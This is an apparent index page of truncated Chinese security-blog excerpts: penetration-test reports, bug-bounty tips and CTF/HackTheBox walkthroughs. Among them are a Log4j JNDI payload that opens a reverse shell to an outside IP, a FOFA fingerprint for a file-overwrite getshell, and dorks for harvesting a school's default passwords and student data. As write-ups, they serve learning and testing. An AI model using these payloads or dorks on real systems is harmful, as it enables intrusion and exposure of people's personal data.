[TOC] 0x1 前言 本篇文章是记录最近给一所大学做渗透测试时该学校存在的漏洞(目前已经修复)。我是先找该学校的微信小程序的资产,因为各位佬们也知道,微信小程序相对于web应用服务端来讲维护较少,所有漏洞存在多,好挖点。 嘿嘿嘿,下面就来讲讲我是怎么从这个小程序端渗透到web应用端。 0x2 知识点讲解 微信小程序的session_key有什么用? 官方文档说是用session_key来生成登
许多新手师傅在尝试挖掘SRC漏洞时,常常找不到合适的切入点。刚开始接触SRC时,我们可以从一些中低危漏洞入手,通过逐步积累经验和自信心,逐渐挑战高危漏洞。在挖掘SRC的过程中,保持良好的心态非常重要,不要急于求成。如果暂时没有找到漏洞,就当作是熟悉大厂的业务逻辑。接下来,为想要入门SRC的师傅们介绍一些简单的案例,帮助大家快速找到自己的第一个漏洞。 信息泄露 关于信息泄露,主要是选择几个接口信息泄
概要 初始知识 web应用枚举 二进制逆向 文件枚举 堆栈溢出 学到知识 hash长度攻击 任意文件读取 二进制逆向分析 信息收集 端口扫描 nmap --min-rate 1000 -p- 10.129.30.104 发现22,80,3000端口 网站探测 目录枚举 feroxbuster -u http://10.129.30.104 feroxbuster -u http://10.12
原文:https://www.vaadata.com/blog/graphql-api-vulnerabilities-common-attacks-and-security-tips/ 前言: GraphQL(图形查询语言)由 Facebook 于 2012 年开发,并于 2015 年开源,自 2019 年起一直归 GraphQL 基金会管理。GraphQL 是一种查询语言,即用于访问数据库或任
针对VMware vCenter的介绍就不多说了,大佬们可以自己搜搜。这里只分享过程和踩到的坑点&技巧。 1 坑点&技巧总结 总体流程分为三大步: 拿wenshell-->获取登录Cookie-->获取域控账密/hash(有域控的情况下) 相应的坑点&技巧也分别在不同的阶段说明,不想看过程的佬可以直接看总结: 拿webshell阶段: 1. 上传webshell
概要 初始知识 枚举 javascript基本代码编写 sql注入 学到知识 csp绕过 sql注入 web程序漏洞 信息收集 端口扫描 发现22和80开放 因为网络原因我们要多扫描几次,有可能还要加-Pn参数 上述域名和ip加入/etc/hosts文件 Website - TCP 80 Site /shop 提供书籍和价格 shop/id 单击会出现一本书 的详细页面 点击添加会让我们
简要 信息收集的重要性不言而喻,根据互联网侧信息泄露+社会工程学技术可以收集大量信息,通过该信息登录后台获取更多功能点扩大信息收集面继续扩大功能点,从而通过更多的功能点测试更多的漏洞。 案例1 google搜索初始密码 site:xxx.edu.cn 初始密码 获取到默认账号和密码规则 google搜索学号 site:xxx.edu.cn 学号 知道初始密码是身份证号,社工库去搜名字检
翻译:https://itm4n.github.io/peap-credentials-wired-connections/#where-to-start 我的一位同事最近遇到了这样一种情况:他可以物理访问使用802.1X连接到有线网络的Windows计算机,同时保存了用于身份验证的用户凭据,随后他想提取这些凭据,您可能认为这没什么特别的,但是事情却有点崎岖波折…… 如何开始 对于这篇博文我将假设
翻译:https://nickguitar.medium.com/hacking-nasa-critical-ssrf-subdomain-takeover-xss-699be0ce3c06 背景 几个月前,我对NASA的漏洞赏金计划非常感兴趣。像其他大型公司一样,他们有大量公开的服务和网页,难以全部监控。一些网站运行着老旧的、废弃的、有漏洞的应用程序,这些程序本不该在线,这正是我寻找的目标。 我
漏洞描述 用友U8-OA基础版存在任意文件覆盖写入漏洞 漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。 FOFA指纹: body="致远" && "/yyoa/" && icon_hash="23842899" 产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底
本文记录了2021年一次有趣的客户目标测试实战。这次经历颇为特别,因此我将其整理成笔记,并在此分享,希望对大家有所帮助。 事件起因 疫情在家办公,准备开始划水的一天,这时接到 boss 的电话说要做项目,老板发话说干就干。先对先对客户资产进行收集,结果意外发现一个大宝贝!就这样开始了与 Yapi 的美丽邂逅。 初步复现 目标界面是这样的 该应用之前爆出过代码执行漏洞,在版本<=1.19
这是Hackthebox Sherlocks系列中的一道AWS CloudTrail日志分析题 在这之前,私以为云渗透就是简简单单的AK+SK账户接管刷分一条龙 做这道题的过程中才发现原来云渗透还别有一番天地 题目虽然解完了 但对其中的很多知识点其实并不熟悉 遂写下这篇文章记录解题的过程及学习到的知识 序言 AWS概述 AWS(Amazon Web Services)是亚马逊公司提供的一套广泛的
前言 最近想写写应急响应的题目,就找到玄机平台,注册帐号后,在「困难」分类里选了一道题,就是这道「第九章-blueteam 的小心思2」,结果没想到是个渗透题(说是先渗透再应急,但应急部分没检测)。这个题没WP,所以整理一下。其他题目的WP可以看先知社区的这篇文章:https://xz.aliyun.com/t/14254 ,好像挺全的。 题目: nacos 的 key 为多少 flag{ba
信息收集 Flag01 发现有一个Solr Admin的框架,尝试利用msf打 发现打的不太行 看一下页面,发现Solr Admin使用了log4j的插件,可以打一下log4j RCE 打一个Log4j shell 发现这里是有可以执行命令的操作的,修改为Log4j的poc ${jndi:ldap://116.62.53.46:1389/Basic/ReverseShell/116.62
信息收集 fscan yakit Flag01 Springboot heapdump 发现一个登录页面,账户admin之后密码爆破就能登入后台,发现后台没啥用 发现poc,从网上搜一下(其实yakit已经告诉漏洞了) Springboot之actuator配置不当的漏洞利用 - FreeBuf网络安全行业门户 访问/actuator,获取敏感信息 存在heapdump文件, 下载下来利用